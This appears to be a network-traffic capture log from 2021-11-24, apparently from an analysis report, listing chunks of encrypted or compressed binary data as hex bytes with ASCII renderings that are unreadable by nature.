                                                                                                  2021-11-24 13:17:21 UTC656INData Raw: a0 78 47 bd cd 06 6a 8d b5 0b 90 f4 39 ba 35 38 0c f7 a4 9b f3 22 0b e5 c9 1e a9 ce 39 a5 e1 f2 a3 58 fb 8f 19 cb ad 35 9b e6 82 28 5f 79 fe 19 f2 0f 48 6d 35 e0 69 30 83 f7 60 20 8b d0 b3 1b 39 79 c5 64 f4 9e dd 96 7c 1a be 6e c4 4e ab 54 44 e8 ba 47 8e 35 f6 c0 ae ee 15 48 e8 50 1a e5 44 26 44 a2 0e 2c bf eb b7 0a dc 2f 95 36 e2 d7 34 ac df a0 3a a5 43 0e 88 b8 47 99 a0 b0 c3 4c 52 5f 3b 02 d2 cc 42 50 4c 38 d9 4f 2f 73 25 1a 06 12 98 a4 d7 6d 7e ef f1 63 a1 ba b0 22 2c 97 4a d8 3c 9c 27 ed f2 8a 4a e1 cc e3 8d 37 f6 72 9a 5c 49 40 79 1c 1f db 12 8e bf 48 84 7f b2 ac ee e2 56 b6 00 7a 5b da 61 ca 43 bc 08 09 5f 93 8d d5 b5 f2 0f 50 76 c0 dc ff 74 48 3b 44 26 01 ca 42 02 4c d8 8a 09 cb a4 1f 4b 28 bb da 04 5c e6 20 73 21 ee 5e f1 77 33 4c c0 ff a7 b9 78
                                                                                                  Data Ascii: xGj958"9X5(_yHm5i0` 9yd|nNTDG5HPD&D,/64:CGLR_;BPL8O/s%m~c",J<'J7r\I@yHVz[aC_PvtH;D&BLK(\ s!^w3Lx
                                                                                                  2021-11-24 13:17:21 UTC657INData Raw: 12 fc 78 19 1c f8 d9 9c 25 96 25 c3 5f 19 3c c9 80 d0 2a 62 29 07 09 cf c3 cc c8 f0 f5 a1 0d 43 a3 06 1b 95 b2 96 f7 80 70 ce 0b b8 ab 91 7f d8 a2 09 b9 cd c4 7f f6 27 2d 5d cc 68 ac 5c 04 26 97 f0 55 aa 3b b5 99 87 e1 88 3f 65 81 e0 43 ef 97 32 1b 2b 58 0a eb ae 5a 6a 5c d0 a7 8a 1d 47 e4 4e 52 5a 42 c7 da 28 19 dd 02 e8 7b ec 99 ae 32 9a 64 3d b9 3f 59 c0 e1 82 38 77 4c 47 bb 72 d7 98 7e ce 29 c0 7e 9c d6 11 4f f5 f9 a2 9f 8c d2 91 0a cb e8 d2 09 dd d2 70 ac ef d8 73 75 f7 ed 45 c1 ea c9 47 8b 96 25 15 7c d7 ba fb 50 8c 02 93 30 2b e9 df 76 de 1f ff d8 18 9f 74 8a 02 6b 2f 9b 72 54 36 89 74 c9 16 28 8d c7 9b 74 63 c8 64 59 08 2d a2 fa e1 b8 f8 6c f6 6d 85 47 61 12 73 b3 cf 2c ef 39 9b 96 27 4f 59 be d4 64 19 b3 e0 aa 11 7c 8a ba d8 cd 2b 7f 2d b7 14 f1
                                                                                                  Data Ascii: x%%_<*b)Cp'-]h\&U;?eC2+XZj\GNRZB({2d=?Y8wLGr~)~OpsuEG%|P0+vtk/rT6t(tcdY-lmGas,9'OYd|+-
                                                                                                  2021-11-24 13:17:21 UTC659INData Raw: 6a 33 a3 49 4d cf c0 2e 1f 1e 04 ea b6 40 61 ec 8e 5b 98 93 dd b8 b0 e5 ac 0c 86 dd e3 f7 45 9e 1f a4 3a fd 31 01 64 66 76 9d 23 a2 fb 11 49 3e 83 06 84 3b 11 65 db 01 1b 93 da 61 22 e4 cb 39 f0 2d 65 a8 e0 d3 b0 79 14 8d b3 b7 23 c5 15 ff 46 39 1a d2 85 c2 fe e2 12 dd ad 35 b9 3c cc e8 b9 00 ca 60 7c 61 be 74 b3 ac 48 52 75 ef bc d6 e1 35 bd 59 0a ae 80 78 93 7e 51 c1 5f 56 a0 2f ce 60 32 1e 9e 6b 45 e7 3d 90 5a af 94 66 0c c4 fe 54 4a bd 96 1a 1f 80 77 5a ad 6d 1d 1b 6a 3d 7c 00 7d 10 b6 c9 cd f9 57 45 8f 4d 6b 48 8e d0 f2 d0 7d 8c 4c 93 d4 74 82 a9 93 75 09 c5 01 06 16 a3 77 20 a8 ac e3 b2 6e 80 e6 34 a0 88 c3 b8 58 4f 9b 3c 9e 1d 6e fd ed 01 4a 13 e6 0f 23 f7 b1 39 8e 80 f7 ff 89 49 77 91 d4 c5 98 48 33 fe e7 80 7d 54 92 df bf c3 5c 57 69 b6 c4 7f 2c
                                                                                                  Data Ascii: j3IM.@a[E:1dfv#I>;ea"9-ey#F95<`|atHRu5Yx~Q_V/`2kE=ZfTJwZmj=|}WEMkH}Ltuw n4XO<nJ#9IwH3}T\Wi,
                                                                                                  2021-11-24 13:17:21 UTC660INData Raw: 50 64 e3 96 b1 83 ec db ba 27 ce 3a 6e 8d e8 6d f0 0a 22 3f 30 55 3c 7a b4 ab 61 80 16 1e 0c 6c e6 42 e4 24 b6 08 46 8e 3d 07 f5 5d a7 ab 1c 41 b3 30 44 e0 e7 63 dd 3a 3b 53 d4 1d ff e4 6b 0e 7f d7 c2 64 e2 d1 ef 13 e8 f9 e9 f0 95 07 53 fb a4 da 98 4c d3 61 1a 44 b3 74 08 bf cd 6a b0 b5 a9 37 59 53 df 4c 54 2a 8f 40 6e 33 99 e6 2a ac 26 52 fd f4 c6 c1 bf a5 e2 8a 1a 91 78 31 4b 34 56 6b af 7f 68 b7 95 8a c2 eb 35 27 a9 f4 45 28 ad 1b 1a c9 d7 52 83 30 34 ee c7 cc 34 32 de 9f 2d 9c 48 1b 43 3a 6d b8 3f ab 14 c1 11 f8 92 90 1d 93 a9 ad 9a d8 d1 d7 09 8c 40 cc 1e d3 14 0a 82 4e 21 85 41 b7 8e ea 92 5f d7 ce 20 c9 15 a7 4a 86 dd a5 2f 89 80 a9 82 ad 8a b5 75 44 d6 d6 89 53 ca cd aa 50 27 8d 31 34 dc ee 39 f5 30 db 5a d3 50 de e2 3e 85 f9 de 56 80 4a 9c 6a 28
                                                                                                  Data Ascii: Pd':nm"?0U<zalB$F=]A0Dc:;SkdSLaDtj7YSLT*@n3*&Rx1K4Vkh5'E(R0442-HC:m?@N!A_ J/uDSP'1490ZP>VJj(
                                                                                                  2021-11-24 13:17:21 UTC661INData Raw: 5f 1f 66 40 cd bd 22 73 ff bd 39 d4 b2 96 f1 9c 49 d8 c7 1b 4e e5 e0 eb e2 bf ee 7d 36 dd a3 fa 69 30 53 62 35 f6 cf 58 1d 2c 0d ee 59 0d 4a 4d a3 22 c2 af 05 6d fa 9f 21 9f ce c2 57 0d db 59 24 5d 8b 80 90 b1 b7 1f 30 f0 1b f6 18 d7 b0 56 a4 38 96 a3 7f 30 d1 9f f8 fb ba 2d 3d 71 97 ff 5c 28 d2 97 dc fd c4 e8 40 d0 9d 5d 5c d6 3f d5 a0 a9 a2 f2 bc fe 9a c0 0b 94 d4 d8 70 f1 d2 a0 3c 2e 0c af 0e 5d 74 2d 31 95 71 37 21 58 bd dd 49 65 9e 5b c2 e9 75 15 02 1b 98 b0 eb 3d c0 f1 ff ab 46 9f 7a cd f1 eb 8e 47 b7 43 7f 49 63 8f 8e 05 c1 c4 0d 71 42 0e 61 49 36 83 83 d5 73 3a b9 7b 97 a1 74 7a 18 d2 8b e0 b0 8a d9 7c 6b dd 57 55 48 11 cd 1d 79 4f 61 96 86 e0 ae bf d8 6a ca d4 68 c9 4e bc ad c9 36 70 d8 d9 0e 92 33 6c f8 f3 48 17 96 5a 56 28 ee d5 ba c8 28 bb b4
                                                                                                  Data Ascii: _f@"s9IN}6i0Sb5X,YJM"m!WY$]0V80-=q\(@]\?p<.]t-1q7!XIe[u=FzGCIcqBaI6s:{tz|kWUHyOajhN6p3lHZV((
                                                                                                  2021-11-24 13:17:21 UTC662INData Raw: db 36 44 ba 6f 66 12 12 83 e8 4e 27 62 61 a9 2d 27 73 29 15 63 c5 24 d4 8e 07 f3 ad dc 37 46 64 27 a3 cc 12 0d f0 49 e3 2e 8b 4a b8 67 ef 20 34 7a 36 24 a3 d1 3b 4c 93 3b b1 8f b6 e2 d6 53 32 52 e4 d1 ee 78 49 c5 a6 14 c8 9c 69 b5 9e 78 b1 e6 67 3f af 94 b1 fa bc 11 96 d8 49 58 4b fb b4 ad 94 73 5d 19 65 96 96 7f b7 6d 27 e6 76 1a b5 6e df d8 ba 2a 7a 3a 9e b2 6d f5 fb d1 c6 04 f9 52 37 b1 64 7f 61 fd 2b 90 4e 5c 90 67 05 77 e2 a6 02 e6 56 64 e3 01 47 17 dc 12 91 26 64 20 ae 90 5f 97 c7 1b 47 53 c7 35 a7 b1 b1 75 e0 59 81 3d f3 47 48 67 2c 40 88 4e eb 1a b8 3c b0 35 02 30 59 00 d4 43 3d 11 55 ce d5 10 ec 47 e5 18 c6 b3 a2 c8 44 20 ff 74 ee 66 1d e0 3c 5f 68 91 da 25 b3 5a ae 3f a8 6d 06 9f 70 60 23 e6 e3 cd 1b 1e 05 e4 73 a6 61 6f 84 bd 47 b2 9d 0a 4d 92
                                                                                                  Data Ascii: 6DofN'ba-'s)c$7Fd'I.Jg 4z6$;L;S2RxIixg?IXKs]em'vn*z:mR7da+N\gwVdG&d _GS5uY=GHg,@N<50YC=UGD tf<_h%Z?mp`#saoGM
                                                                                                  2021-11-24 13:17:21 UTC664INData Raw: 2f 10 bb 6b 33 36 25 eb 25 1c 74 d6 9c 08 a7 65 8f f3 bc d6 18 f2 a4 f4 23 87 b4 b9 53 b4 c1 9f e2 38 8b 34 98 4b 1a 06 f8 3b d7 de be e6 3e 8e 11 e3 20 e4 15 c1 51 e4 33 02 8d 8d 8a fa 9f 45 fe 67 7d e4 5f 3a e4 73 34 5b ca 9f 4a 3f a1 74 71 3b 12 68 5b 47 c1 15 1d aa 2c d7 33 c4 28 25 a6 87 6b 16 4e e9 b0 1b 79 09 e8 af bf b0 01 34 35 0f 69 cc bc 05 a6 8c 6a 8b 91 e9 ee e2 bc 6d b2 72 8f b9 40 6e e2 9f 22 ea 3a 44 01 14 b7 24 19 e8 97 dc c5 79 35 18 b2 33 4d 1c 35 87 ec dd 82 d2 37 38 e0 5c e0 ab e0 a0 4d 63 8e 20 48 5c 32 9c 5b 24 09 db 4a 0e db 92 cd a3 2f 36 c3 19 82 30 7d 00 c9 74 38 6f 8b ac 73 05 04 e0 64 78 c0 2a 56 35 4f d8 d0 10 d5 33 f7 bb 9b 61 04 94 20 f6 4e 38 8a 33 27 f2 9e 5a 0f 10 cc 84 a2 40 83 b4 f1 e6 c3 50 58 c7 76 45 05 fb 0d c0 13
                                                                                                  Data Ascii: /k36%%te#S84K;> Q3Eg}_:s4[J?tq;h[G,3(%kNy45ijmr@n":D$y53M578\Mc H\2[$J/60}t8osdx*V5O3a N83'Z@PXvE
                                                                                                  2021-11-24 13:17:21 UTC665INData Raw: d9 23 40 8c 0f 6b fd 5f a6 cc e9 81 f3 bb 36 33 8e b0 26 65 d4 c8 e2 d4 19 53 d7 22 20 74 c7 5d 67 07 87 ff c2 ad 75 5b a7 1d 39 11 2b 24 27 80 31 32 fc 03 86 33 45 52 fe c1 13 31 7f b1 28 aa e6 da 72 16 90 3e 40 3b 7d ea 27 c5 a5 9a 00 66 18 34 86 7e 02 6e 3e b7 6f e8 19 44 89 14 68 15 49 9a c2 36 5d 6b 49 c6 6f 31 dc 0d bd ea 9d 5f d4 19 84 ac a4 3e 25 9e e0 bd 64 bb 39 c3 b8 4c b3 47 12 d0 e8 ec 6a f9 01 51 1f b9 a6 9c 9b 43 f6 89 39 d3 15 db 69 6a d7 1d 30 25 7a f4 e6 61 0d e2 5e 5d 2f cb b9 cc 87 7c cc 28 c5 f6 d0 f9 4a 8b e3 41 b9 bf 6a 3d fa a0 07 aa b1 d3 ce ec 88 3b 7c 99 a9 b1 90 2b 6c 6d f5 d8 97 0d 43 3d d5 65 05 ff 52 70 8c 47 6b 4d 12 f2 fb 5a 53 7b 62 23 34 a6 3e 52 dc f3 18 d2 1a 6a be d5 c9 55 c6 3c cb 49 ce 43 a7 d8 ee f0 d0 b7 d6 3e 92
                                                                                                  Data Ascii: #@k_63&eS" t]gu[9+$'123ER1(r>@;}'f4~n>oDhI6]kIo1_>%d9LGjQC9ij0%za^]/|(JAj=;|+lmC=eRpGkMZS{b#4>RjU<IC>
                                                                                                  2021-11-24 13:17:21 UTC666INData Raw: 91 25 7d ac 2f 1a 3d 9e f9 9a a2 ed 0d 7f 90 05 05 51 61 1c ee 4f 61 28 95 96 30 af d7 af c1 ca 2d 5e e4 e7 88 c8 c1 e9 58 48 d7 94 77 be c7 f3 2c 9b 27 63 aa 9b cd 2f b2 61 11 59 08 3a 19 49 1d 52 3b 93 ab 8a 36 77 c2 2a ae 54 e5 61 27 3b e1 f1 c4 4f de 0a 1a b0 8d b6 c4 22 b3 a5 d1 85 cf 89 59 57 6e 3c 88 7f 43 01 eb ce 60 7c 26 f1 18 e0 05 b2 0b 5b 6a e2 e6 a4 c4 30 f7 bf 61 12 3c cb 03 5f c2 21 ce a8 91 bc 7a 0e f9 7d 33 49 a5 1a 63 52 ad a0 d3 74 0d 82 6c 2b 29 1c ab fa 27 7b b9 70 d2 f5 57 a6 3a 6b d3 1b f7 6d 62 44 3a 44 1f af 7b d1 55 e3 96 45 d1 d8 78 3d 3e 3a 88 47 af e1 26 7f b6 aa d1 48 3d 02 51 0e 22 bd 2b 98 d3 7d 7c 05 84 a2 f5 7c cf 0b 53 b8 1d e1 7c 9c 7b 00 38 9b 03 4c ca 94 f3 ad ee 01 e4 cd ee df a2 9a da 6a 49 13 88 4e 4c c6 c5 07 41
                                                                                                  Data Ascii: %}/=QaOa(0-^XHw,'c/aY:IR;6w*Ta';O"YWn<C`|&[j0a<_!z}3IcRtl+)'{pW:kmbD:D{UEx=>:G&H=Q"+}||S|{8LjINLA
                                                                                                  2021-11-24 13:17:21 UTC667INData Raw: a2 45 16 c4 6f d2 bf 0c 88 a9 04 d6 14 ef 97 98 4a 86 0d fb 39 29 c3 42 fe 5d bd 2f 16 2b a8 35 75 e9 68 db e4 0d 01 0a 84 58 fa 8b d2 23 14 88 80 99 82 ef 7e d4 22 51 53 be 04 d9 27 48 52 af 73 85 d4 a6 86 d7 29 05 60 13 ea 5a dd 43 ab 5a 9d 46 24 a1 e9 44 61 20 51 31 87 84 8f 12 1b 77 0e 42 e7 1e 9c 22 d7 4a 4e f3 57 35 65 7e c0 5a 11 6a e1 44 cf d6 92 17 27 63 fa 69 5b 2a 3a fd 4f 3f 93 cf 17 a1 9e 64 5d 99 e4 4e ef fd a6 d4 11 b9 51 67 09 fa a2 bb 8d 36 a1 1a 5c ea db 0a ad 6d 47 aa 0d 9b 97 f0 2f d2 88 c0 77 ed a5 eb d5 aa 49 78 dc ae 17 e1 df 6d 35 f5 e5 a8 64 d9 89 cf a1 02 32 06 37 ec 90 b1 e5 4f 0d bc f3 63 07 42 d0 99 61 2e df c9 09 9c e4 0c 65 ef e7 4c 5d bf 39 7f c6 73 ce 7a 52 c1 b8 a7 66 08 0c 78 25 76 4c 9f d7 2b ab 5d 6f d5 92 57 1e c8 b2
                                                                                                  Data Ascii: EoJ9)B]/+5uhX#~"QS'HRs)`ZCZF$Da Q1wB"JNW5e~ZjD'ci[*:O?d]NQg6\mG/wIxm5d27OcBa.eL]9szRfx%vL+]oW
                                                                                                  2021-11-24 13:17:21 UTC669INData Raw: 0e b0 c4 4f 43 03 10 8c bd 40 c7 e6 4a f6 33 45 5b 5e 8c 87 ab 81 46 df 64 58 af 77 f4 ed 1d 79 53 48 e0 6a 3d ac 33 92 c2 0c d0 e4 e9 30 ff 2d 4f 9c c3 3f 4c ee f9 01 17 97 a6 98 64 d7 17 ab ba bb 3b 5a 21 b7 5e 5a b2 83 50 b3 e3 0b 3c 33 8f 68 cd d6 7e 6d 72 a9 24 b7 e7 fd 73 a6 98 ad 9e 28 6f 45 8c 08 47 c0 8d 07 45 3b af 30 cb b1 60 61 e1 d0 38 6d 4c 84 8b 48 94 2e 37 d2 48 3a 11 de 32 de b8 b8 1c 8f 38 a7 34 39 12 b8 8e 96 ca eb 50 b7 5d 7e 1e 24 1a de c7 b3 0e 31 8e c7 96 56 38 b0 64 e3 65 85 1c 3e 1f fd e9 37 cf a5 43 32 55 44 04 7e d1 e6 7c c4 2e ca b9 7b 35 5d 5a 1c 52 99 97 c0 56 bf 11 61 6a 01 27 a6 72 85 65 26 c7 3a 5d a3 da 52 3b 8b bd 70 92 cb 30 05 bc 6d 69 ac cd 8f 4c ec 9f e8 fb 4b 6c a2 6c ab 8a 8c 52 41 70 f4 8b 5d d2 4c 83 36 e4 b2 4c
                                                                                                  Data Ascii: OC@J3E[^FdXwySHj=30-O?Ld;Z!^ZP<3h~mr$s(oEGE;0`a8mLH.7H:2849P]~$1V8de>7C2UD~|.{5]ZRVaj're&:]R;p0miLKllRAp]L6L
                                                                                                  2021-11-24 13:17:21 UTC670INData Raw: 48 13 bc ec 6b d5 cc 5b 82 b1 e0 53 bf c3 20 29 d4 70 41 de cf 40 8a 54 6d f9 2a 31 2b 6c f4 07 fe 4a e5 9e 9f 88 25 71 24 e0 01 32 a5 14 af d3 d3 da c2 83 3d 47 44 da 25 46 4c c7 09 fe cf 0b 25 76 2f 37 01 e7 b1 ff 57 0a 85 06 90 f9 d9 f2 ae 15 69 45 d1 30 64 94 2f 3d c1 81 37 63 fa 5d 26 94 22 2f bc 30 be 40 4b df 57 79 b0 d5 e6 76 b6 67 ba 6d 05 72 32 3a 51 ee 61 39 71 a2 63 02 b0 81 45 7c 55 f5 07 d9 52 eb 2c 3c 60 c6 79 79 2d 3a a9 d3 c3 f8 03 65 b3 19 85 2d 8c 53 62 3f df 6a 46 8e 3d c0 f6 2b ae 2a 19 2f 84 e6 2e 83 66 33 ed 25 48 a8 2c 28 d6 31 43 dd 55 24 4c be ad 0b 9a 37 f6 aa 5f 39 13 81 fb c6 74 47 1e 6d 9f 0b aa 77 01 7a 1e 4b 6f 0a 85 be d8 37 41 1b bc 17 44 11 6b a2 75 da 3d 6a e1 0d 85 e9 71 9d 08 d7 19 11 88 a2 f4 31 e5 de 33 89 b9 2c a5
                                                                                                  Data Ascii: Hk[S )pA@Tm*1+lJ%q$2=GD%FL%v/7WiE0d/=7c]&"/0@KWyvgmr2:Qa9qcE|UR,<`yy-:e-Sb?jF=+*/.f3%H,(1CU$L7_9tGmwzKo7ADku=jq13,
                                                                                                  2021-11-24 13:17:21 UTC671INData Raw: af f9 b9 0c da d2 ba ac 2a 76 2a d3 cd d8 b9 3c 0b c7 20 d7 67 e8 4c 41 1d f3 cf 26 f9 29 85 69 73 42 2d 39 6d 38 45 3d 82 39 98 d4 12 76 bb d5 96 2d 94 a9 80 c1 47 a9 95 c1 89 ee 75 0d ab 38 89 40 31 e5 da 20 23 b0 4a 80 87 9a 74 bb 1b c7 3c 3e d0 70 9e bd 30 ae 0c f8 9e 01 9e fa ba a7 e3 18 89 ef c8 51 14 18 1e 87 dc 3a 26 68 86 b0 b5 ad b0 e4 c7 b6 c2 e5 ab 10 64 7e d6 70 bd a5 c5 39 a0 be 45 c5 5a 07 93 a6 47 66 8f d4 68 0b 38 e7 ba a7 66 35 20 29 6c 98 21 b6 e6 a7 a1 df 4c 8b da b4 19 87 79 46 89 f2 64 a8 17 09 0b a7 c0 02 a1 ad 04 8b f8 55 56 9f fd 79 19 8e 28 61 8f 4f c5 32 10 bc 7f 43 29 ab 29 c0 90 16 c0 ee 66 32 1a 01 4e eb c0 a5 41 9c e5 7d b9 5d cb de 38 12 fc 96 8b 62 14 42 b1 e2 e4 bd 75 22 2a c9 19 16 49 e8 6e 8e 44 03 a5 a3 31 c0 aa 62 d8
                                                                                                  Data Ascii: *v*< gLA&)isB-9m8E=9v-Gu8@1 #Jt<>p0Q:&hd~p9EZGfh8f5 )l!LyFdUVy(aO2C))f2NA}]8bBu"*InD1b
                                                                                                  2021-11-24 13:17:21 UTC672INData Raw: 5b 6a 97 be 24 29 ac fd 43 ed 6f 4f bd 67 f7 1b a4 d2 7f 45 7b 5a 6a aa ee fe 69 57 2a dd b8 1a 0b f7 86 12 23 38 d8 fa 18 eb 47 65 c8 12 24 ed 71 c2 3c 21 f7 e8 6f 4b 48 11 59 72 82 04 a7 e1 08 b2 cc 49 ca cc 9a 54 19 21 22 d1 46 2e 73 7e 11 03 27 37 7d 77 cf bd 70 df 80 2a 22 37 67 ff d8 a9 18 21 7e f5 2c 26 70 62 32 58 bd 0e fc 18 a6 49 54 da 18 ec 61 ac 48 6d a2 11 66 93 5b 29 e5 e4 c3 0a 99 db 17 de 57 a3 56 36 30 c6 e6 d7 08 34 72 20 e6 78 a5 a8 18 9f 15 56 f5 9c b6 ea 6e 6b d9 93 d2 46 3b c4 00 ab 75 d6 8f 50 ef f5 f8 37 cf 3f 5d 35 32 c7 55 7f 6f e4 4a 18 cb 29 63 6d 2d 5f 39 0e 01 95 d5 c5 ec e0 70 65 e3 9d dc bb 47 35 98 db 30 3c 1d 07 b4 a3 67 53 48 07 ad ea aa e7 26 87 08 c7 6e 47 b5 98 9a 4c 04 c9 21 34 cc 2a f2 44 45 7d b0 64 f9 43 35 4b e5
                                                                                                  Data Ascii: [j$)CoOgE{ZjiW*#8Ge$q<!oKHYrIT!"F.s~'7}wp*"7g!~,&pb2XITaHmf[)WV604r xVnkF;uP7?]52UoJ)cm-_9peG50<gSH&nGL!4*DE}dC5K
                                                                                                  2021-11-24 13:17:21 UTC673INData Raw: 0e fb 01 a6 39 70 bc a7 58 eb d4 14 84 a8 e6 07 1b f2 23 21 66 80 b4 5d 3a 56 b2 a6 8a a5 8b 3d f2 6f ab 5b 41 d1 c7 11 af 62 55 9e 90 68 df a1 3a f6 ad d3 d0 5a 81 b6 2c fd de ba c6 53 3f c3 1c 8e 31 21 a5 b5 ef fb b8 6b ea b0 65 9f 38 e2 ac 05 96 7d b9 05 4f 4a d7 1c f2 c4 29 e6 b9 fd c7 70 88 51 dc 28 61 52 f1 74 b6 32 92 73 40 32 3c 62 81 2c 2d 00 c8 52 56 fa 66 7a 16 9e 52 79 7e f2 5c d4 ca e2 3c 0c 29 94 4f 26 95 ce b6 16 b5 d9 00 b8 60 3c a9 3d da b1 1c 24 26 1a b6 01 a0 ce 1f e2 47 f5 5e bd 4f 2c ed af 22 14 75 76 7b d9 07 73 30 f7 92 07 5d bd 28 14 c5 94 44 d7 9e 2a e7 3c 07 c1 90 45 f4 9e dd 73 eb a3 c4 e0 19 67 35 4f d0 09 d7 75 83 75 c2 d4 e5 b3 b6 aa fc f7 13 0e 63 d9 df 21 b4 3d 61 6c b3 b7 20 16 f6 a1 d7 3e 96 e6 1c d9 74 7b a4 20 3e c6 07
                                                                                                  Data Ascii: 9pX#!f]:V=o[AbUh:Z,S?1!ke8}OJ)pQ(aRt2s@2<b,-RVfzRy~\<)O&`<=$&G^O,"uv{s0](D*<Esg5Ouuc!=al >t{ >
                                                                                                  2021-11-24 13:17:21 UTC675INData Raw: ad 3f 91 1c 0f 01 18 0c 3b a5 d2 a4 2a 0b 6c bd 31 98 f9 f4 8b 00 9a 40 eb be 77 41 45 7e 77 bf 01 b3 ee 1b 58 78 a2 3b 99 3f 23 1c ed 77 97 6d 06 e7 4c d4 12 44 96 4d f9 15 5e 07 e1 db da 4a 7c 66 ca dc 4a 60 96 74 f9 6a 86 f8 35 d9 e2 ce 21 b4 0e a7 5c 55 54 40 40 9f e1 3d a6 d8 0e 64 60 f4 2e 31 93 16 ea 9b d8 e9 6c 6a 0a fa b9 56 5e 4f 78 5a d7 13 21 44 91 c0 d7 24 26 46 fb de 5e 45 ab 12 08 72 ab 37 45 30 50 c4 c9 cb 3a 02 e0 77 0f fa b0 d2 ce 77 00 59 34 5b 4b dd 2d c5 b9 8f f1 9f 2e 93 b7 c2 e2 b6 be e8 fd e3 d4 ab 24 36 d2 37 c0 17 39 e9 01 f7 34 04 a7 6f 2d 85 34 be 7b f3 ec 32 54 5e 8a ac 91 a7 2a 8b a9 12 b3 d9 e0 3a 06 b4 87 6c 3c ad 3c 74 f7 f9 ac 81 ec 44 d8 5b 3c 91 df 04 08 18 46 6d 92 7c 81 6b 33 5e 04 df 6f fa fa 94 c4 4f 45 08 09 a5 2d
                                                                                                  Data Ascii: ?;*l1@wAE~wXx;?#wmLDM^J|fJ`tj5!\UT@@=d`.1ljV^OxZ!D$&F^Er7E0P:wwY4[K-.$6794o-4{2T^*:l<<tD[<Fm|k3^oOE-
                                                                                                  2021-11-24 13:17:21 UTC676INData Raw: db c4 f3 98 91 70 07 7c 61 e7 f0 68 a2 2d 4c 91 6e 67 dd 71 28 32 5d 54 9a 54 4b 48 e3 ed b5 0e 1f f5 24 7e 23 37 9f 73 70 04 c5 6d 1a ed bf e9 89 7c d7 de 44 1c 6d 42 b0 76 26 1d 6b ee 17 bc b7 15 f8 2c 61 1f 30 46 6e 9c e6 8d fe 6a 6a 5c 89 8a 6b 56 0d 80 47 a9 f6 3f 3b 56 79 15 08 8a 4c 22 a1 ed df cc 50 72 ee c3 76 43 8a b1 d5 0b 9b 75 5e e2 9d bc 06 e7 60 55 6a 9a 3d 81 20 c1 98 d2 f0 4b e5 17 24 fb bf 69 66 e6 8b be 28 8a f1 f0 ec a9 a1 18 3e 1f 0c c2 42 2a 37 f6 93 24 27 0b 7d 0c 9d c3 79 fc 19 b6 14 06 c7 54 9c 44 e5 55 ac 21 d7 25 32 57 3a cb fb 56 c8 aa 04 e8 b1 6c a0 20 34 03 d4 3b 6e f8 61 22 9c a4 20 56 ae 60 60 37 bc a2 0c 37 b0 88 25 32 59 5f 1b e8 98 86 41 03 d7 ea a0 e1 54 6f 4e ea 58 c3 5b 59 fd 8e 4b 0d e0 fb 19 55 4f 72 64 77 c6 06 ae
                                                                                                  Data Ascii: p|ah-Lngq(2]TTKH$~#7spm|DmBv&k,a0Fnjj\kVG?;VyL"PrvCu^`Uj= K$if(>B*7$'}yTDU!%2W:Vl 4;na" V``77%2Y_AToNX[YKUOrdw
                                                                                                  2021-11-24 13:17:21 UTC677INData Raw: cd 20 57 8a 92 f9 d5 a9 5d 34 70 25 e1 ad 4a db 36 04 05 ce 29 66 19 74 cc fd 1d 38 dd fa cc f6 43 b5 b4 53 23 41 2e 2f 2f 0b eb d0 b0 44 34 9e b2 48 93 3c c9 c4 00 00 2f 75 d5 5e 79 4c ca 96 e3 b1 6f 7c c7 d6 ae 33 84 94 84 1f d6 3b df 29 51 52 d1 8a 69 51 24 0d ae 7a 67 dc d9 16 cd 84 dc 7d e4 07 f6 d8 42 f2 cd 53 36 d4 62 5b 67 86 87 70 65 5a 30 7e 75 00 91 68 47 9f a9 92 6e 29 25 9c 5d b2 48 92 7a 9d fc 98 0f d0 1b 16 21 72 5d 06 07 2d 10 c6 76 f1 3a 7b 7b 26 90 16 ac 66 6e 9d e5 af 93 3b 9d 6c 5a 8f b7 ef 96 23 0e ba 40 6b 93 37 29 ee 49 28 6e a6 ee 1e 28 c2 62 c4 4a f8 f2 50 9e cc 64 04 2e 4b a2 6a 9d 05 2a 62 c6 0d d7 58 37 1d f6 c3 a4 1e a2 20 bb 59 dd 8b 9f 28 a5 7d 49 62 f7 64 a4 48 28 53 5f ab 94 b2 3f 73 5c fe 4b 79 5b d5 04 9e dc 88 77 bd e8
                                                                                                  Data Ascii: W]4p%J6)ft8CS#A.//D4H</u^yLo|3;)QRiQ$zg}BS6b[gpeZ0~uhGn)%]Hz!r]-v:{{&fn;lZ#@k7)I(n(bJPd.Kj*bX7 Y(}IbdH(S_?s\Ky[w
                                                                                                  2021-11-24 13:17:21 UTC678INData Raw: 22 ad a7 03 9b 79 6f d4 e8 0f 72 b6 2a a0 0b f0 1a 27 fd 09 29 98 15 84 5d 6a aa c1 f2 9a b7 7c 3a 43 60 a4 5e 16 8c f3 90 67 7b ba d0 07 8e 5b b1 d8 eb 76 6d 43 f7 85 ab 61 15 3e 72 1f 35 de f0 85 76 3a f6 06 5b 20 bf 4f c9 a2 1b 68 c7 14 4e b7 80 e1 21 1d 6a 63 d4 68 44 a6 41 05 94 b2 fb 6c 3e ad 67 f3 1a 8d 42 f3 5e 08 63 9e 31 25 2f 20 00 5c 7e 6f 2d f4 8d 15 ae d1 9b 3d c7 b8 cb a1 78 1c 9c 24 76 bb 29 ff a1 34 1b 58 25 14 5f f2 63 e2 a6 bd ff 44 20 3c 6a 21 b1 5d ea 94 24 2d ec b6 0b 31 00 ed 5f 0f 35 9f b7 49 6b af df 6f 7b 40 42 45 c4 30 1d 83 0b d1 01 0a 0b 48 f8 3a 42 6e 5d 58 84 15 da 0e 3e fe 63 33 ea 87 f5 eb 8c 83 de 4e e0 fb b3 ac a2 02 3f 0f 24 79 a1 b9 02 21 0b 58 1a 4f 1c c0 86 5d b9 cb d7 e8 66 9f 17 00 19 ce f4 64 21 76 9b 07 26 da 40
                                                                                                  Data Ascii: "yor*')]j|:C`^g{[vmCa>r5v:[ OhN!jchDAl>gB^c1%/ \~o-=x$v)4X%_cD <j!]$-1_5Iko{@BE0H:Bn]X>c3N?$y!XO]fd!v&@
